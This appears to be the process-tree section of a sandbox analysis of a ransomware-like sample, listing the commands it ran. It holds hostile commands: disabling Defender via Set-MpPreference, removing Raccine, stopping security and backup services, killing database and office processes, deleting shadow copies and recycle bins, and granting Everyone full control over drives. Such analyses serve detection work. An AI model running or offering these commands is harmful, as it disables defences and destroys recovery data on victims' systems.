C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q3⤵
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵
-
C:\Windows\PAExec-4396-RJMQBVDN.exeC:\Windows\PAExec-4396-RJMQBVDN.exe -service1⤵
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Windows\TEMP\tmpA086.bat3⤵
-
C:\Windows\system32\find.exefind "}\"4⤵
-
-
C:\Windows\system32\mountvol.exemountvol4⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\1618038130 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q3⤵
-
-
